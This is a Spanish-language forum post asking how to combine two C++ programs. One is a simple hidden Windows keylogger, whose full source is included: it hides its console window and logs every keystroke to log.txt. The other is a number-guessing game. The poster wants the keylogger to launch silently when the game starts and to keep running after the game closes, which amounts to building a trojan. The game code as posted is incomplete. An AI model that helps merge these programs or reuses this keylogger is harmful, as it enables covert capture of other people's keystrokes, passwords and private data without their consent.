Me gustaría saber si me podríais a ayudarme con un problema que tengo en C++, es el siguiente:
Tengo dos códigos, el primero es un juego y el segundo es un keylogger muy simple, y me gustaría poder juntar ambos, de tal manera que cuando el juego se ejecute se abra de manera independiente el keylogger, y cuando se cierre el juego, el keylogger permanezca abierto...
A continuación, el keylogger.
Código
using namespace std; int main() { HWND stealth; AllocConsole(); stealth=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); char key; while (true){ Sleep(10); for(key = 8; key <= 190; key++){ if(GetAsyncKeyState(key) == -32767){ ofstream fichero; fichero.open("log.txt",fstream::app); fichero << key; fichero.close(); } } } return 0; }
Y el programa principal.
Código
#include <iostream> #include <cstdlib> #include <ctime> int main(void) { srand(time(NULL)); while(true) { int number = rand() % 99 + 2; int guess; int tries = 0; char answer; while(true) { std::cout << "Introduce un numero del 1 al 100(" << 20 - tries << " intentos restantes): "; std::cin >> guess; std::cin.ignore(); if(tries >= 20) { break; } if(guess > number) { std::cout << "Demasiado alto! Prueba de nuevo.\n"; } else if(guess < number) { std::cout << "Demasiado bajo! Prueba de nuevo.\n"; } else { break; } tries++; } if(tries >= 20) { std::cout << "Te has quedado sin intentos!.\n\n"; } else { std::cout<<"Felicidades! " << std::endl; std::cout<<"Has acertado! " << tries << " intentos!\n"; }
Gracias por su atención.